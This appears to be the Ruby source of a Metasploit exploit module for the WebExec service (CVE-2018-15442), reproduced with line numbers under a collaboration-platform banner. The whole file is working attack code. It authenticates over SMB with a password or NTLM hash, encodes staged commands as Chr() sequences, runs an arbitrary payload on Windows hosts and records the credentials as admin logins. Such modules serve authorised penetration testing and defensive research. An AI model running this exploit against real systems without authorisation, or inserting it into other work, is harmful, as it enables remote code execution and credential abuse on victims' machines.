Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
# Windows XP systems that are not part of a domain default to treating all
7
# network logons as if they were Guest. This prevents SMB relay attacks from
8
# gaining administrative access to these systems. This setting can be found
9
# under:
10
#
11
#  Local Security Settings >
12
#   Local Policies >
13
#    Security Options >
14
#     Network Access: Sharing and security model for local accounts
15

16
class MetasploitModule < Msf::Exploit::Remote
17
  Rank = ManualRanking
18

19
  include Msf::Exploit::CmdStager
20
  include Msf::Exploit::Remote::SMB::Client::WebExec
21
  include Msf::Exploit::Powershell
22
  include Msf::Exploit::EXE
23
  include Msf::Exploit::WbemExec
24
  include Msf::Auxiliary::Report
25

26
  def initialize(info = {})
27
    super(update_info(info,
28
      'Name'           => 'WebExec Authenticated User Code Execution',
29
      'Description'    => %q{
30
        This module uses a valid username and password of any level (or
31
        password hash) to execute an arbitrary payload. This module is similar
32
        to the "psexec" module, except allows any non-guest account by default.
33
      },
34
      'Author'         =>
35
        [
36
          'Ron <[email protected]>',
37
        ],
38
      'License'        => MSF_LICENSE,
39
      'Privileged'     => true,
40
      'DefaultOptions' =>
41
        {
42
          'WfsDelay'     => 10,
43
          'EXITFUNC' => 'thread'
44
        },
45
      'References'     =>
46
        [
47
          ['URL', 'https://webexec.org'],
48
          [ 'CVE', '2018-15442' ],
49
        ],
50
      'Payload'        =>
51
        {
52
          'Space'        => 3072,
53
          'DisableNops'  => true
54
        },
55
      'Platform'       => 'win',
56
      'Arch'           => [ARCH_X86, ARCH_X64],
57
      'Targets'        =>
58
        [
59
          [ 'Automatic', { } ],
60
          [ 'Native upload', { } ],
61
        ],
62
      'DefaultTarget'  => 0,
63
      'DisclosureDate' => '2018-10-24'
64
    ))
65

66
    register_options(
67
      [
68
        # This has to be a full path, %ENV% variables are not expanded
69
        OptString.new('TMPDIR',     [ true, "The directory to stage our payload in", "c:\\Windows\\Temp\\" ])
70
      ])
71

72
    register_advanced_options(
73
      [
74
        OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]),
75
        OptInt.new('MAX_LINE_LENGTH', [true, "The length of lines when splitting up the payload", 1000]),
76
      ])
77
  end
78

79
  # This is the callback for cmdstager, which breaks the full command into
80
  # chunks and sends it our way. We have to do a bit of finangling to make it
81
  # work correctly
82
  def execute_command(command, opts)
83
    # Replace the empty string, "", with a workaround - the first 0 characters of "A"
84
    command = command.gsub('""', 'mid(Chr(65), 1, 0)')
85

86
    # Replace quoted strings with Chr(XX) versions, in a naive way
87
    command = command.gsub(/"[^"]*"/) do |capture|
88
      capture.gsub(/"/, "").chars.map do |c|
89
        "Chr(#{c.ord})"
90
      end.join('+')
91
    end
92

93
    # Prepend "cmd /c" so we can use a redirect
94
    command = "cmd /c " + command
95

96
    execute_single_command(command, opts)
97
  end
98

99
  def exploit
100
    print_status("Connecting to the server...")
101
    connect
102

103
    print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")
104
    smb_login
105

106
    if not simple.client.auth_user and not datastore['ALLOW_GUEST']
107
      print_line(" ")
108
      print_error(
109
        "FAILED! The remote host has only provided us with Guest privileges. " +
110
        "Please make sure that the correct username and password have been provided. " +
111
        "Windows XP systems that are not part of a domain will only provide Guest privileges " +
112
        "to network logins by default."
113
      )
114
      print_line(" ")
115
      disconnect
116
      return
117
    end
118

119
    begin
120
      if datastore['SMBUser'].to_s.strip.length > 0
121
        report_auth
122
      end
123

124
      # Avoid implementing NTLMSSP on Windows XP
125
      # http://seclists.org/metasploit/2009/q1/6
126
      if smb_peer_os == "Windows 5.1"
127
        connect(versions: [1])
128
        smb_login
129
      end
130

131
      wexec(true) do |opts|
132
        opts[:flavor] = :vbs
133
        opts[:linemax] = datastore['MAX_LINE_LENGTH']
134
        opts[:temp] = datastore['TMPDIR']
135
        opts[:delay] = 0.05
136
        execute_cmdstager(opts)
137
      end
138
      handler
139
      disconnect
140
    end
141

142
  end
143

144
  def report_auth
145
    service_data = {
146
        address: ::Rex::Socket.getaddress(datastore['RHOST'],true),
147
        port: datastore['RPORT'],
148
        service_name: 'smb',
149
        protocol: 'tcp',
150
        workspace_id: myworkspace_id
151
    }
152

153
    credential_data = {
154
        origin_type: :service,
155
        module_fullname: self.fullname,
156
        private_data: datastore['SMBPass'],
157
        username: datastore['SMBUser'].downcase
158
    }
159

160
    if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'
161
      credential_data.merge!({
162
        realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
163
        realm_value: datastore['SMBDomain']
164
       })
165
    end
166

167
    if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/
168
      credential_data.merge!({:private_type => :ntlm_hash})
169
    else
170
      credential_data.merge!({:private_type => :password})
171
    end
172

173
    credential_data.merge!(service_data)
174

175
    credential_core = create_credential(credential_data)
176

177
    login_data = {
178
        access_level: 'Admin',
179
        core: credential_core,
180
        last_attempted_at: DateTime.now,
181
        status: Metasploit::Model::Login::Status::SUCCESSFUL
182
    }
183

184
    login_data.merge!(service_data)
185
    create_credential_login(login_data)
186
  end
187
end
188

189